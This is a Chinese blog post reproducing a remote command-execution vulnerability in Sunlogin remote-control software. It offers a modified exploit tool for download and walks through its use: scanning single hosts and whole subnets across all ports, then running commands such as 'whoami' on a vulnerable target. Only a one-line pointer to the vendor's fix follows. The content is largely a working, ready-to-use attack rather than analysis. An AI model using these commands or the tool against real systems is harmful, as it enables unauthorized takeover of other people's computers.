向日葵命令执行漏洞复现

0x01 漏洞简介

向日葵是一款免费的，集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

上海贝锐信息科技股份有限公司向日葵的简约版和个人版for Windows存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权。

影响范围：

向日葵个人版 for Windows 演示环境为存在漏洞向日葵版本v11.0.0.33162 ，漏洞检测利用工具是来自TRY大佬写的工具，博主在其基础上修改了下部分源码，新增支持了网段检测漏洞功能。向日葵漏洞版本：11.0.0.33162 点击下载 提取码

qm7u

向日葵RCE工具修改版：点击下载 提取码:

vnp5

0x03 漏洞利用

漏洞检测利用工具修改版使用命令如下：

代码语言：javascript代码运行次数：0运行复制

╔═╗┬ ┬┌┐┌╦  ┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐╚═╗│ ││││║  │ ││ ┬││││───╠╦╝│  ├┤╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘   ╩╚═└─┘└─┘                                                by:T00ls.net                                                向日葵Rce 修改版                                                支持IP、网段检测----------------------------------------------Usage of xrkRcePro.exe:  -c string        指定命令  -h string        支持IP（x.x.x.x）  网段(x.x.x.0/24)  -p string        指定端口 (default "1-65535")  -t string        指定类型：scan rce (default "scan")  -x int        检测速度 (default 2000)

检测某目标是否存在漏洞：

代码语言：javascript代码运行次数：0运行复制

xrkRcePro -h 10.211.55.3 -t scan

检测某网段是否存在漏洞：

代码语言：javascript代码运行次数：0运行复制

xrkRcePro -h 10.211.55.0/24 -t scan

默认扫描全端口：1-65535，可以根据实际场景指定端口范围

代码语言：javascript代码运行次数：0运行复制

xrkRcePro -h 10.211.55.3 -t scan -p 50000-60000

默认检测速度是2000，可以根据实际场景选择检测速度：

代码语言：javascript代码运行次数：0运行复制

xrkRcePro -h 10.211.55.0/24 -t scan -x 8000

检测到目标及端口号存在漏洞，利用RCE工具远程执行命令

代码语言：javascript代码运行次数：0运行复制

xrkRcePro -h 10.211.55.3 -t rce -p 50164 -c "whoami"

0x04 漏洞修复

厂商已发布了漏洞修复程序，请及时关注更新：https://sunlogin.oray.com/

参考文章https://mp.weixin.qq.com/s/25LqiXhqgEz_yHPdd9vPVw